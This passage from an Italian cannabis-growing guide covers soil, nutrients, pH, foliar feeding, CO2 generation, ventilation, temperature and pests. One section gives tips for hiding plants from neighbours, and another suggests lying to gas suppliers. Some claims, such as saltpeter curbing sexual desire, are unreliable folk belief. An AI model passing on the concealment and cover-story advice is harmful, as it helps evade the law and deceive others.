potrebbe trovarlo. Il test del DNA potrebbe provare che si tratta del tuo cane!
Usa cristalli d'acqua P4 nel concime per dare alle piante un minimo di riserva d'acqua per
alcuni giorni. Questa sostanza si gonfia in presenza dell'acqua e la trattiene come una
spugna, in modo che radici avranno una riserva se una dura siccità rende necessari
innaffiamenti costanti. Vacci veramente piano con questa roba, in quanto tende a sedimentarsi
sul fondo del vaso e a soffocare le radici più profonde (le radici giovani appena spuntate)
arrestando lo sviluppo della pianta. Usala con estrema moderazione, lasciala gonfiarsi per
almeno un'ora prima di mescolarla con altro concime.
La dimensione della pianta nella terra è direttamente proporzionale alla dimensione del vaso.
Se vuoi che la pianta cresca più grande, mettila in un vaso più grande. Di solito, un vaso
da 2 litri per una pianta da 30 cm è sufficiente. Una pianta di 2 metri richiederebbe un vaso
da almeno 10 litri di volume. Ricorda che i recipienti quadrati hanno un volume maggiore in
uno spazio quadrato o rettangolare (come un ripostiglio).
Piantare nel terreno è sempre preferibile quando fai uso di concimi. Le piante possono
crescere quindi liberamente, senza le restrizioni imposte dalle dimensioni del vaso.
Guano di pipistrello, escrementi di pollo o di vermi possono tutti essere impiegati per
fertilizzare organicamente il terreno. I concimi possono bruciare, così prima dovrebbero
essere ridotti in concime organico con della terra, prima di piantare, per diverse settimane.
Si possono utilizzare anche alghe marine per fornire un ricco apporto di minerali in tracce,
visto che si decompongono lentamente e nutrono quindi con continuità le piante.
Se coltivi all'aperto con buona disponibilità di terra, guarda se nei paraggi ci sono foglie
ed altre fonti naturali di azoto ed aggiungile al terreno, insieme con con alcune "dolomite
lime" e fertilizzanti ridotti in concime organico. Anche una piccola quantità di nutrimenti
per piante come il Miracle Grow può essere ugualmente aggiunta al terreno. (I coltivatori
organici aggrottano le ciglia per questa pratica, comunque. La lavorazione di fertilizzanti
commerciali produce infatti rifiuti tossici.) Puoi ottenere un buon concime naturale dalle
foglie; spargi il fogliame sull'area di coltivazione per mantenerla umida e limita le erbacce
vicino alle piante.


SOTTERFUGIO


E' interessante notare che le piante di marijuana possono realmente essere mescolate tra le
altre piante al punto da non essere identificabili da tutti ma soltanto dagli osservatori più
accorti. Ricordo che un mio parente durante una visita in Texas mi mostrò il suo mais nell'
orto e mi accorsi delle numerose piante di maria soltanto quando mi trovai a meno di un metro
da loro.
Le piante seminate all'aperto in tarda stagione non diventano mai troppo grandi e non danno
mai nell'occhio quando vengono sistemate vicino a piante simili o di dimensioni maggiori.
Le piante di dimensioni simili coltivate in mezzo a tanti alberi risulteranno pressoché
invisibili nel loro camuffamento.
All'aperto il compito è quello di controllare l'accesso all'area per non destare sospetti.
Nascondile di qua e di là a casaccio, mai secondo uno schema riconoscibile. Distanziale tra
di loro, e distribuiscile sul suolo disponibile in modo che siano costantemente illuminate
dal sole, pur essendo nascoste o mescolate. Le reti di recinzione e gruppi di diverse piante
messe insieme sono la cosa migliore. Cerca di trovare un tipo di pianta che si armonizzi con
le piante circostanti. Somministra azoto alle tue piante se c'è bisogno che siano più verdi
per meglio confondersi tra le altre. Alcuni coltivatori usano perfino fiori di plastica rossi,
attaccati alla pianta, camuffandola come un cespuglio di fiori.
Visita le piante di notte con la luna piena, e se sei visibile ai vicini, fai finta di potare
un albero, di falciare il prato, o fai qualcosa nel cortile che ti renda inosservato.
Scava un buco e infilaci il vaso con la pianta. L'altezza della pianta sarà ridotta di almeno
30 centimetri.
Alcuni coltivatori spuntano la pianta quando è più alta di 30 cm, e crescono le due parti
orizzontalmente con un graticcio. La pianta non sarà mai più alta di un metro, e non
insospettirà in alcun modo i vicini rompipalle. Questo tipo di pianta può essere coltivata
anche nel tuo cortile in piena vista.


NUTRIMENTI


I nutrimenti per piante hanno tre elementi notevoli che si riveleranno il principale sostegno
del tuo giardino: Azoto, Fosforo e Potassio Questi 3 ingredienti di solito sono elencati sull'
etichetta frontale della confezione del nutrimento per piante nell'ordine di N-P-K (Nitrogen,
Phosphorus, Potassium). Un nutrimento per piante 20-20-20 ha una concentrazione di azoto del
20%.
I nutrimenti secondari sono Calcio, Zolfo e Magnesio. Quantità in tracce di boro, rame,
molibdeno, zinco, ferro e manganese.
A seconda dello stadio di crescita, diversi nutrimenti sono richiesti in momenti differenti.
Per lo sviluppo delle radici e la germinazione, sono richiesti nutrimenti con alte
concentrazioni di fosforo (high P) e basse concentrazioni di azoto e potassio. La crescita
vegetativa ha bisogno di molto azoto, e l'orina umana è una delle migliori fonti, (miscela
250 millilitri di piscio per circa 4 litri d'acqua), anche se non è un fertilizzante completo
di per se stesso. 20-20-20 con elementi in tracce dovrebbe renderlo tale; trovo molto valido
il Miracle Grow Patio. Curati anche del livello di calcio, magnesio, zolfo e ferro. Questi
sono importanti. Un cucchiaio da cucina di dolomite calcarea o idrato di calcio è usato in 4
litri di soluzione per la crescita quando un ambiente idroponico è inizialmente portato
avanti, per fornire azoto, calcio e magnesio. Il sale inglese viene impiegato per migliorare
i livelli di magnesio e zolfo nella soluzione.
Il tabacco cresciuto con nitrato di potassio brucia meglio. Alimenti per piante con PN,
fosforo e azoto, (P2N3) sono nutrimenti del tipo Miracle Grow. Questo è un fertilizzante
eccellente per la crescita vegetativa, o anche durante il ciclo della fioritura. Considera
comunque che il nitrato di potassio è anche noto come Salt Peter, ed è usato per quegli
uomini cui viene meno il desiderio sessuale o sono impotenti, o anche nei manicomi. Così se
alcune di queste sono destinate alla cottura, potresti usare emulsioni di pesce o altri
fertilizzanti completamente organici su queste piante, almeno nelle ultime settimane di
fioritura.
La maggior parte delle soluzioni idroponiche dovrebbero essere nell'intervallo di 150-600
parti per milione in alimenti solidi disciolti. 300-400 ppm è il valore ottimale. E' possibile
testare la tua soluzione o concime con un misuratore della conducibilità elettrica se non sei
sicuro di ciò che somministri alle tue piante.
Tieni presente che la maggior parte dei valori degli alimenti solidi disciolti sono di solito
sul lato basso, e i livelli dei nutrimenti effettivi notevolmente più in alto. E' possibile
con colture idroponiche passive, ottenere un incremento dei nutrimenti dopo diverse
concimazioni, al punto che l'ambiente idroponico è completamente saturo di nutrimenti.
Alimenta la pianta semplicemente con acqua pura di quando in quando, fino a quando noti
che le piante non sono tanto verdi, e quindi riprendi con l'alimentazione tradizionale.
Il "pompaggio" si verifica quando usi più innaffiamenti per far crescere le piante più
velocemente. Questo può essere rischioso se procedi in maniera imprudente, a causa dei
problemi di sovrainnaffiamento potenziale. Deve andarci piano e visionare le piante
quotidianamente e inizialmente ogni ora, per essere sicuro di non innaffiare a dismisura le
piante. Usa miscele di nutrimenti per piante più povere del normale, diciamo un 25%, ed
assicurati di filtrarle una volta al mese e di fornire acqua pura alle piante almeno in ogni
occasione in cui annaffi. Questo vale specialmente per le piante coltivate in un ambiente a
base di terra. L'uso di nutrimenti per piante Oxygen Plus a bassa concentrazione (o un
alimento a base di perossido di idrogeno) permette alle radici di respirare meglio e previene
i problemi di sovrainnaffiamento. Controlla il terreno per essere sicuro che non ci sia
alcuna anomalia nel PH che potrebbe essere dovuta al perossido di idrogeno nella soluzione.
(Un coltivatore esperto mi ha detto che non usa H2O2 (HP) a causa dei possibili problemi di PH.
Questo non dovrebbe essere un problema se tieni d'occhio il PH e lo correggi nelle soluzioni
dell'innaffiamento.)
Assicurati che il tuo ambiente abbia un buon drenaggio. A questo punto se innaffi le piante
sistemate nel terreno una volta alla settimana, puoi innaffiare ogni 3-5 giorni invece di
piantarle in un ambiente con un miglior drenaggio. La perlite o la lava aumenteranno
enormemente il drenaggio dell'ambiente e renderanno necessario un innaffiamento più
frequente. Questo pomperà le piante; queste tenderanno a crescere più velocemente a
causa del migliorato apporto di ossigeno alle radici. Assicurati che l'habitat della pianta
sia asciutto prima di un nuovo innaffiamento, in questo modo la pianta cresca più velocemente.
Un'alternativa è usare una mistura di nutrimenti per piante standard (più forti) una volta
ogni 3 innaffiamenti. I nutrimenti vengono trattenuti nell'ambiente ed immagazzinati nel
suolo per un uso successivo. I nutrimenti vengono lavati via con 2 innaffiamenti consecutivi
dopo e non si verifica l'accumulo di sali nel suolo (non applicarlo alle colture idroponiche).
Smetti di nutrire le piante 2 settimane prima del raccolto, in modo che le piante non abbiano
il sapore del fertilizzante. (Questo vale anche per le colture idroponiche.)
AVVERTIMENTO: Non sovrafertilizzare. Farà morire le tue piante. Leggi sempre le istruzioni del
fertilizzante che devi impiegare. Usa una quantità dimezzata se lo aggiungi all'acqua per ogni
nutrimento in terra o in ambiente idroponico, se non sei sicuro di ciò che le tue piante
possono assimilare. Passa gradatamente a concentrazioni più elevate di nutrimenti per tutto
il tempo. I coltivatori novizi tendono a sovrafertilizzare le loro piante. I sali minerali si
accumulano con il tempo a livelli più alti di nutrimenti disciolti. Usa acqua pura per
alimentare le colture idroponiche se ritieni che la concentrazione sia troppo elevata. Filtra
le piante che stanno nei vasi ogni mese. Se le tue piante sembrano divenire veramente verdi,
non somministrare sostanze nutritive per un bel pezzo per accertarti che non siano
sovraalimentate.


PH E FERTILIZZANTI


I PH può fare o disfare la tua soluzione nutritiva. Valori compresi tra 6.7-6.2 sono i più
indicati per assicurare che non si verifichi alcun blocco dei nutrimenti. Le colture
idroponiche richiedono una soluzione con PH corretto prima di metterle a contatto delle
piante. L'acido fosforico può abbassare il livello di PH; la calce o la potassa (carbonato
di potassio) possono alzarlo quando diventa troppo acido. Acquista un misuratore di PH per
10 dollari ed usalo nel terreno, nell'acqua, e nell'ambiente idroponico per accertarti che
con il passare del tempo non diventi alcalino o acido. Per ambienti molto neutrali puoi
usare un po' di aceto per portarlo da un valore di pH 7 a 6.5 o giù di lì.
La maggior parte dei fertilizzanti causa un cambiamento di pH nel suolo. Aggiungendo
fertilizzante al terreno quasi sempre si ha come conseguenza un pH più acido.
Con il passare del tempo, l'accumulo di sali prodotti dalla scomposizione dei fertilizzanti
nel suolo provoca un incremento progressivo dell'acidità del suolo ed alla fine la
concentrazione di questi sali nel suolo arresterà lo sviluppo della pianta e causerà
un oscuramento delle foglie. Inoltre, quando la pianta invecchia le sue radici diventano
meno efficienti nel portare nutrimenti alle foglie. Per evitare l'accumulo di questi sali
nella terra ed assicurare che la tua pianta assimili tutte le sostanze nutritive di cui ha
bisogno puoi iniziare a nutrire le foglie della pianta quando ha raggiunto il mese e mezzo
di vita. Disciogli il fertilizzante in acqua calda e spruzza la mistura direttamente sulle
foglie. Le foglie assorbono il fertilizzante nelle loro nervature. Se vuoi continuare a
mettere il fertilizzante anche nel suolo per nutrire le foglie, assicurati di non
somministrare alle piante un'overdose di sostanze nutritive.



NUTRIMENTO DELLE FOGLIE

Il nutrimento delle foglie sembra essere una delle vie più facili per incrementare il
raccolto, per velocizzare la crescita e la qualità in uno spazio ben ventilato, con o
senza elevati livelli di CO2. Prepara semplicemente un infuso con escrementi di vermi,
emulsioni di pesce, guano di pipistrello, o con molti altri nutrimenti per piante indicati
per il fabbisogno alimentare durante gli stadi vegetativi e di prima fioritura. Non è
raccomandato per la tarda fioritura, o sprecherai il materiale spruzzato tardi. Smetti di
nutrire le foglie 2-3 settimane prima del raccolto. Lava le foglie con acqua pura ogni
settimana per prevenire l'ostruzione degli stomi delle foglie. Cibale quotidianamente.
Il miglior momento del giorno per nutrire le foglie è dalle 7 alle 10 del mattino e dopo le
5 del pomeriggio. Questo perché gli stomi nella parte inferiore delle foglie sono ancora
aperti. Inoltre, la temperatura ideale è di 22 gradi, e sopra i 25 non possono essere
affatto aperti. Così trovati la parte più fresca della giornata, se fa caldo, e la parte
più calda se fuori fa freddo. Può essere che tu debba spruzzare le foglie alle due del
mattino se è quella la parte del giorno più fresca. Lo

  
spruzzatore usato deve atomizzare
la soluzione in una nebbiolina molto fitta; tira fuori il tuo miglior spruzzatore ed usalo
per questo scopo. Accertati che il PH sia tra 7 e 6.2. Usa bicarbonato di sodio per aumentare
il PH della soluzione, ed aceto per diminuirlo. E' meglio spruzzare più spesso ed usarne meno
per volta, che infradiciare le piante una volta ogni tanto. Usa un agente imbibente per
prevenire la formazione di grosse gocce d'acqua, e di conseguenza che le foglie non si
brucino come sotto l'azione di piccoli prismi riflettenti. Stai attento a non spruzzare
su una lampadina accesa; meglio ancora, spruzza solo quando le lampadine si sono raffreddate
(se bagni infatti una lampadina da troppe ore accesa e quindi molto calda, potrebbe scoppiare
a contatto con una sostanza di gran lunga più fredda).
Forse il miglior nutrimento per le foglie comprende l'uso di acqua di seltz e cibo per piante
contemporaneamente. Così facendo, la CO2 e i nutrimenti sono forniti direttamente alle foglie
con una sola spruzzata.
Il nutrimento delle foglie è riconosciuto nella maggior parte dei testi specializzati come il
metodo migliore per cibare una pianta una volta che i problemi di blocco delle sostanze
nutrienti hanno iniziato a ridurre la capacità di assorbimento dalle radici.
AVVERTIMENTO!: è importante lavare le foglie che devono essere raccolte prima che si siano
asciugate, se intendi mangiarle, dal momento che possono avere nitrati su di loro.
NOTA: Un coltivatore che ha letto questo documento ha commentato: "Le emulsioni di pesce
puzzano. Il guano di pipistrello potrebbe essere molto antigienico. Tienti stretto il
Rapid-Gro, il MgSO4 (sale inglese), la soluzione idroponica con elementi in tracce. I
sali nitrati (l'"N" in NPK) non sono molto sani da fumare. Personalmente, io non nutro
mai le foglie."
Al di là di questo assennato commento, c'è molta saggezza nel mantenere organico, non
tossico, un giardino. Personalmente, uso solo CO2 sulle mie piante idroponiche al coperto,
e non nutro mai le foglie. Semplicemente non è necessario quando usi colture idroponiche.


ANIDRIDE CARBONICA


Elevati valori di anidride carbonica possono aumentare considerevolmente la velocità di
accrescimento, fino quasi a raddoppiarla. Pare che le piante si siano evolute nei periodi
primordiali in cui i livelli naturali di CO2 erano molto più elevati di quelli odierni. La
pianta si serve della CO2 nella fotosintesi per produrre zuccheri che usa per costruirsi i
tessuti. Aumentare i livelli di CO2 significa aumentare la capacità delle piante di produrre
questi zuccheri e il tasso di crescita della pianta viene considerevolmente incrementato.
Produrre CO2 in sicurezza, a buon mercato e/o con convenienza può essere una pena, ed è
difficile da allestire. La CO2 è molto utile per la fioritura, quando la pianta è molto densa
ed attraversa il momento più critico per quanto concerne la circolazione dell'aria nelle
foglie. Se tu coltivi durante la fase vegetativa rigorosamente al coperto, (portando poi le
tue piante all'aperto per la fioritura), allora la CO2 non sarà un fattore determinante a
meno che tu non abbia una serra sigillata, un ripostiglio, uno sgabuzzino o una camera da
letto, e desideri aumentare la produzione e ridurre il tempo di fioritura.
Per una operazione al coperto di medie dimensioni un approccio è quello di usare contenitori
di plastica di CO2 presi dai fornitori a domicilio. Questo inizialmente ha un certo costo, ma
relativamente poco costoso sul lungo periodo. Questi sistemi sono indicati solo se la tua area
non è né troppo grande né troppo piccola.
Il sistema di base a taniche di CO2 è di questo tipo:
Contenitore da 10 kg 100 dollari; Regolatore 159 dollari; Timer o regolatore 10-125 dollari;
Il pieno di CO2 15-20 dollari

Caso peggiore: 395 dollari per l'installazione di un contenitore di CO2 sincronizzato ad un
aspiratore da un termostato.
Si può produrre a basso costo CO2 bruciando gas metano. Comunque, il calore e il monossido di
carbonio devono avere uno sfogo all'aria aperta. Si può ottenere CO2 acquistando o noleggiando
bombole dai locali fornitori a domicilio. Se ti fanno domande, puoi dire di possedere un
vecchio saldatore a casa che ti serve per aggiustare il tagliaerba (rimorchio, macchina,
ecc...)
Per un piccolo sgabuzzino, un serbatoio potrebbe durare 2 mesi, ma dipende da quanto gas
rilascia, da quanto la stanza è ventilata, ore di ciclo di luce, fessure nella stanza,
livelli di arricchimento e metodi di dispersione. Questo metodo può risultare fatale per
il tuo piccolo ambiente.
E' visto generalmente di buon occhio avere un piccolo flusso costante di CO2 sulle piante
durante tutto il tempo in cui la luce è accesa, diffusa direttamente sopra le piante durante
il tempo i cui i ventilatori sono spenti.
Ci sono dei sistemi per conservare la CO2, ma questi possono costare un bel gruzzoletto.
Quando la luce è spenta non c'è bisogno di CO2, così durante la fase della fioritura, ne
userai la metà come se avessi il solenoide della CO2 collegato al timer della luce. Quando
il ventilatore è acceso per il ricircolo, allora la CO2 viene interrotta. Questo può essere
praticato per metà del tempo in cui la luce è accesa, in modo da incidere sui tempi di
esposizione delle piante e sulla quantità di gas che realmente bisogna impiegare.
In un ambiente chiuso, usare bombole di gas è la cosa migliore, dal momento che la produzione
si somma all'effetto serra, e anche la CO2 in bombola viene catturata come parte del processo
produttivo di molti materiali, e quindi riciclata. Fermentando, i generatori di CO2, e i
metodi del bicarbonato di sodio e dell'aceto producono tutti nuova CO2 che incrementa
l'effetto serra.
E' possibile la creazione di CO2 dalla fermentazione e dai generatori. Un semplice generatore
di CO2 potrebbe essere una stufa alimentata a propano. Questo funzionerà bene, per tutto il
tempo in cui i gas potranno diffondersi nell'area di coltivazione, ed un ventilatore verrà
impiegato per tenere in circolo la CO2 calda (che sale) e disponibile in basso al livello
delle piante. Il fuoco e gli scarichi prodotti dalla stufa costituiscono anche un problema.
Una stanza che deve essere ventilata per il 50% del tempo per liberare l'ambiente dal calore
di una lampada e della stufa non riceverà tanta CO2 quanta una stanza che può essere
lasciata senza ventilazione per diverse ore alla volta. Comunque, i generatori di CO2 sono
l'unica strada da prendere per operazioni su larga scala.
La fermentazione o l'aceto sul bicarbonato di sodio funzioneranno se non avrai molti cicli di
ventilazione, ma se hai abbastanza calore da costringerti a fare costanti o regolari
ventilazioni, questi metodi non risulteranno più pratici. Soltanto versa l'aceto sul
bicarbonato di sodio e chiudi la porta, (perdi la tua CO2 tanto presto quanto più ventili
l'area). Questo metodo lascia molto a desiderare, visto che non è facile regolarlo
automaticamente, e richiede un'attenzione quotidiana. E' possibile comunque creare CO2
dalla fermentazione, lascia il vino diventare aceto, e versalo sul bicarbonato di sodio.
E' il sistema più conveniente sotto il profilo economico per la maggior parte dei coltivatori
da sgabuzzino, per i quali 400 dollari nel mettere in piedi la produzione di CO2 sono davvero
una mazzata.
Durante la fermentazione, il fermento continuamente si autoelimina; occupa molto spazio. Hai
bisogno di un bidone capiente per aggiungere costantemente acqua, in modo che i livelli
dell'alcol non si alzino quanto basta per eliminare il fermento. Lo zucchero viene impiegato
per raggiungere velocemente questo scopo, ed un sacco da 5 Kg costerà 3,50 dollari o giù di lì
al massimo in 2-3 settimane circa. E' anche difficile stimare cosa accade a lungo andare e a
quanto ammonta realmente la produzione Un tubo che fuoriesce dalla cima e arriva in una
vaschetta d'acqua formerà bolle e dimostrerà che si è verificata una produzione di CO2.
Prova il bicarbonato di sodio mescolato con aceto, 1 cucchiaino: circa 30 cc. Questo reagirà
provocando bollicine e gorgoglii quando liberi la CO2. Fallo solamente quando hai chiuso la
porta che dà sulle tue piante. Una via MOLTO più conveniente per procurarsi CO2 si basa su
50 grammi di zucchero in una bottiglia da 2 litri di acqua (sterilizzata la prima volta con
candeggina ed acqua, quindi risciacquata), più alcuni centilitri di piscio (!) o, se insisti,
fermenti nutritivi presi da un semplice fornitore di birre a domicilio. Aggiungi i fermenti di
birra, sbatti bene e mantienilo a 25 gradi. Passate 2 settimane o giù di lì produrrà circa 15
grammi di CO2 per ogni 30 grammi di zucchero impiegati. Guadagnerai un po' per volta,
iniziando uno nuovo ogni 3 giorni o giù di lì. Con l'aggiunta di CO2 la crescita è
fenomenale!!! Ho misurato di persona una crescita di 38 cm in 8 giorni sotto una lampadina
HPS da 250 watt (con tubolari luminosi, a fissaggio orizzontale).
Un buon contenitore è un bricco in plastica di latte da 4 litri, con un beccuccio sul tappo.
Inoltre, la chiusura del passaggio di aria da una parte del tubo luminoso acceso nel bricco
riempito con acqua tiene lontani i batteri e dimostra che la fermentazione è in atto.
Una variazione possibile è quella di spruzzare acqua di seltz sulle piante due volte al
giorno. Alcune celebrità del settore però non lo raccomandano, ricevendo di conseguenza
incredibili cazziatoni da parte di chi, una volta provato, ha riscontrato dei miglioramenti
nel raccolto. E' ovvio che ognuno vorrebbe adoperarsi solamente per un piccolo sgabuzzino
non ventilato, ma potrebbe andare bene solo in alcuni casi. Potrebbe risultare oneroso con
molte piante da spruzzare. Usa acqua di seltz, non bicarbonato di sodio in barrette, dal
momento che contiene più sodio che potrebbe ostruire gli stomi delle piante. Lava le tue
piante con acqua pura dopo 2 o 3 spruzzate di seltz. C'è molto lavoro, e non puoi
automatizzarlo, ma forse è un bene! Ricorda, stare con le piante è una bellissima esperienza,
e ti avvicina alla tua spiritualità e alla terra. L'acqua di seltz viene venduta nella
maggior parte dei negozi di generi alimentari (Io l'ho comprata al Lucky's a 0.79 dollari
per una bottiglia da 2 litri). Il bicarbonato di sodio in tavolette andrà bene lo stesso
se proprio non hai acqua di seltz, ma ha il doppio del sodio rispetto all'acqua di seltz.
Una soluzione veramente diluita di Miracle Grow può essere spruzzata sulla pianta insieme
all'altra. Una delle caratteristiche dell'uso di acqua di seltz è che incrementa i livelli
di umidità. Assicurati di ventilare l'ambiente umido durante il ciclo di buio, o potresti
rischiare la formazione di funghi ed un aumento eccessivo della lunghezza degli internodi.
ATTENZIONE: Non spruzzare troppo vicino ad una lampadina calda! Spruzza solo verso il basso,
oppure prima spegni la luce.
Anche se l'arricchimento con la CO2 può significare un incremento della produzione
del 30-100%, la scocciatura, il costo, lo spazio, il pericolo ed il tempo impiegato
possono rendere una ventilazione costante o molto costante un'alternativa molto invitante
all'arricchimento. Finché la pianta ha l'opportunità di assimilare nuova CO2 di continuo,
da aria che ha oltre 200 parti per milione di CO2, le piante avranno tutti i nutrimenti
indispensabili per la fotosintesi. La maggior parte degli sgabuzzini avrà bisogno di un
ricambio di nuova CO2 ogni due o tre ore, perlomeno. Quasi tutte le città hanno
concentrazioni molto elevate di CO2 nell'aria, ed alcuni coltivatori trovano che iniezioni
di CO2 in circostanze simili non sono necessarie.
Alcuni coltivatori hanno scritto su High Times che elevate concentrazioni di CO2 nella stanza
dedicata alla coltivazione in prossimità del periodo del raccolto diminuiscono la potenza del
fumo. Può essere una buona idea terminare la somministrazione di CO2 due settimane prima del
raccolto.



VENTILAZIONE

Devi ventilare molto se usi una lampada HID, meno per quelle a fluorescenza. Inoltre, la
produzione di umidità richiede almeno una ventilazione di pochi minuti al giorno. Per una
stanza con una lampada calda che produce calore rapidamente, la miglior ventilazione sarebbe
una che libera la stanza in 5 minuti, quindi uno stop di 25 minuti prima di eseguire una nuova
ventilazione, o allo stesso modo, una ventilazione di 3 minuti con 12 minuti di pausa e via di
seguito. Il trucco sta nel trovare un timer che svolgerà questo compito. Non è facile da
reperire e non è economico. Una volta che hai bisogno di regolare acceso/spento e viceversa
la CO2 con il ventilatore, fai un pensierino ad un regolatore climatico per circa 100 dollari.
Alternative possono essere un termostato che accende un ventilatore quando si è raggiunta una
data temperatura, e lo spegne quando la temperatura scende di 4 gradi. Ma è una pizza
coordinare la diffusione di CO2 con questo, dal momento che non sai quando il ventilatore
si accende. 39 dollari per un termostato del genere, ma sincronizzarlo alla CO2 con un relé
a rivelazione di voltaggio costa 100 dollari per l'interruttore bell'e pronto, così in
sostanza il controllore ambientale a 100 dollari è più conveniente. Tutto ciò di cui hai
realmente bisogno è un ventilatore che purifica l'aria in pochi minuti, un commutatore di
temperatura che accende e spegne il ventilatore, ed un interruttore inverso che disattiva
e attiva la produzione di CO2. Se puoi ventilare la stanza veramente in poco tempo ed il
calore non si produce troppo in fretta, la CO2 può essere diffusa in maniera lenta, continua,
e potrebbe essere prodotta tra i periodici e rapidi cicli di ricambio dell'aria.
Si possono usare due timer sincronizzati, ma il solo sistema a buon mercato disponibile è
l'intervallo di 30 minuti, dunque 48 scatti per 24 ore. In questo modo io posso avere un
ventilatore che gira per 30 minuti, quindi spento per altri 30. Posso anche sincronizzarlo
alla luce in modo da non dover essere costretto a ventilare quando la lampada è spenta.
Posso sincronizzarlo ad un identico timer che attiverà la CO2 durante il tempo in cui il
ventilatore non è acceso, e viceversa. Sarebbe difficile sincronizzarli a meno di 5-10
minuti, ma almeno ci sarebbe una soluzione possibile e poco costosa. 20 dollari per due
di questi timer.
Comprare ventilatori per far circolare l'aria è costoso, ma io mi sono semplicemente recato
da liquidatori locali di componenti elettronici che avevano ventole d'occasione per 5-10
dollari, e così sono riuscito ad ottenere un risparmio effettivo di 50-70 dollari rispetto
al prezzo di ventilatori nuovi in un negozio di articoli per giardinaggio. Un buon
ventilatore manterrà l'umidità e la temperatura a valori bassi, e diffonderà la CO2
alle tue piante con l'apporto di nuova aria.
Anche la circolazione interna dell'aria è realmente indispensabile. Si dovrebbe usare un
ventilatore basculante per far circolare l'aria all'interno della stanza di coltivazione,
per aiutare il ricircolo della CO2. In più manterrà bassa l'umidità, permettendo all'aria di
assorbire più umidità, riducendo così il rischio di funghi. Un ventilatore a muro non porterà
via spazio prezioso dal pavimento. Le migliori stanze di coltivazione hanno la massima
circolazione dell'aria all'interno.



TEMPERATURA

La temperatura adatta è uno dei fattori maggiormente variabili. La maggior parte dei libri
stabilisce che la temperatura ottimale per la crescita è di 20-25 gradi, ma c'è una lunga
lista di circostanze attenuanti che provocano un aumento della temperatura. Assumere
modificazioni genetiche non sembra essere un fattore, le piante sembrano potere assorbire
più luce a temperature più elevate, forse fino a 30 gradi o poco più. Alti livelli di luce
e di CO2 potrebbero spingere la temperatura a 35 gradi per incrementare la velocità di
accrescimento (consulta: D. Gold: 'CO2, Temperature and Humidity', 1991 - Casa editrice E.
Rosenthal).
Una condizione ideale di 35 gradi è data da una luminosità molto intensa, un arricchimento
di CO2 dell'ordine di 1500 parti per milione e una buona ventilazione costante per mantenere
bassa l'umidità. Non è chiaro se questa temperatura ridurrà la potenza nei fiori. Può essere
una buona idea ridurre la temperatura una volta che è cominciata la fase della fioritura, per
mantenere la potenza del fumo, anche se riduce la velocità di accrescimento. Ma temperature
più alte aumenteranno considerevolmente la velocità di crescita vegetativa della pianta,
stimolandone il metabolismo, assumendo i livelli richiesti di CO2 e la luce disponibile, e
impediranno un aumento dell'umidità.
Con livelli normali di CO2, in uno spazio ben ventilato, 32 gradi sembrerebbero essere la
temperatura massima consentita, mentre 30 gradi possono avvicinarsi maggiormente alle
condizioni ideali, anche con molta luce a disposizione. Non lasciare la temperatura della
stanza andare oltre i 35° C perché potrebbe incidere negativamente sullo sviluppo della
pianta. La temperatura ottimale è tra i 27 e i 30 gradi se hai una luce intensa senza
arricchimento di CO2. Meno di 21° C è troppo freddo per una crescita corretta.
Le basse temperature di notte sono OK sotto i 15 gradi all'aperto, quindi comincia ad
effettuare la crescita in grande stile. Una temperatura media intorno ai 10 gradi causerà
un leggero shock e una attorno ai 4 gradi medi ucciderà le tue piante con una ripetuta
esposizione. Tieni le tue piante al caldo, specialmente le radici. Alza i vasi se ti sembra
che il terreno assorba il calore dalle radici. Questo può essere un problema se hai una
lastra o un altro tipo di pavimento freddo.
Come la temperatura sale, così aumenta la capacità dell'aria di trattenere acqua, quindi si
riduce l'umidità, e pertanto una temperatura media più alta dovrebbe ridurre il rischio di
funghi.
In contrasto con molti rapporti, un alto tasso di umidità non è indicato per le piante
eccetto durante la germinazione e la formazione delle radici. Una umidità più bassa aiuta
la pianta a traspirare CO2 riducendo in questo modo il rischio di muffa durante la fioritura.
Alcuni studi indicano che la potenza delle gemme scema quando la temperatura sale, così è
importante stare attenti che le piante non ricevano troppo caldo durante i cicli della
fioritura.



PARASSITI

Devi realmente guardarti dai parassiti, o tutti i tuoi sforzi potrebbero avere come
conseguenza un minimo ritorno o, al peggio, la perdita di tutta la produzione. Acari e
afidi sono i peggiori; mosche bianche, bruchi e funghi sono gli unici da tenere d'occhio a
lungo termine. Un bombardamento di piretro può ripulire da zero la stanza, e quindi spruzzi
di sapone fatto in casa o commerciale faranno il resto. Quando porti dentro le piante
dall'esterno, spargi il piretro su ogni singola foglia in alto e in basso e anche sulla
terra. Quindi ispezionale minuziosamente per una settimana o due, e insapona ogni residuo
di vita degli insetti che trovi fin dalle uova che li hanno fatti nascere. Dovresti fare
questo trucco per un mese o due, un periodo lungo a sufficienza per non avere problemi in
vista del raccolto.
I funghi sono un ulteriore ostacolo sulla via di una strepitosa stagione di raccolto. Quando
i fiori sono all'incirca a metà dello sviluppo divengono soggetti a funghi o alla
decomposizione delle gemme. Sembra che le condizioni di crescita dei funghi siano migliori
quando la temperatura è tra i 15 e i 25 gradi e l'umidità è alta. I funghi sono molto
distruttivi e si diffondono rapidamente. C'è un tipo di spora di fungo che raggiunge le
altre gemme tramite il vento così è impossibile prevenirla o fermarla se le condizioni del
tempo ne consentono lo sviluppo. Se le cose dovessero mettersi male e i funghi iniziassero
ad intaccare le tue piante, devi rimuoverli immediatamente o si diffonderanno nelle altre
aree della pianta o in altre piante.
Alcuni coltivatori rimuovono soltanto la porzione di gemma infettata mentre altri rimuovono
l'intero ramo. La rimozione del ramo intero assicura maggiormente che il fungo sia totalmente
rimosso, e in più consente al coltivatore di assaggiare il raccolto con alcune settimane di
anticipo.
I funghi possono prosciugare il tuo raccolto rapidamente, quindi investi in alcuni fungicidi
sicuri e spruzzali sulle piante solo prima della fioritura se pensi che i funghi possono
crearti un problema. Non spruzzarli sulle piante se non mai ha avuto problemi prima con i
funghi. Mantieni basso il livello di umidità, fai circolare l'aria come un pazzo sull'area
di coltivazione e tieni le piante all'aperto che non sono state in quarantena lontano da
quelle all'interno. Non aspettare fino a dopo la fioritura, dal momento che non è una buona
idea applicare il fungicida direttamente sui fiori. Invece, i fiori devono essere tagliati
quando sono infetti.
La maggior parte dei fungicidi ha un odore sgradevole, e tu non vorrai certamente ingerirli
o fumarli, così è necessario usarne uno che sia sicuro per i vegetali. Ancora meglio:
procurati prodotti adeguati, di quelli che trovi nelle serre; contengono solo zolfo in
soluzione.
Usa una soluzione di sapone come Safer Insecticidal Soap per sbarazzarti della maggior parte
dei problemi legati agli afidi. Usa alcuni estratti di tabacco e polvere di peperoncino
piccante aggiunto a questo per gli acari. Dott. Bronnars Soap può essere impiegato con alcuni
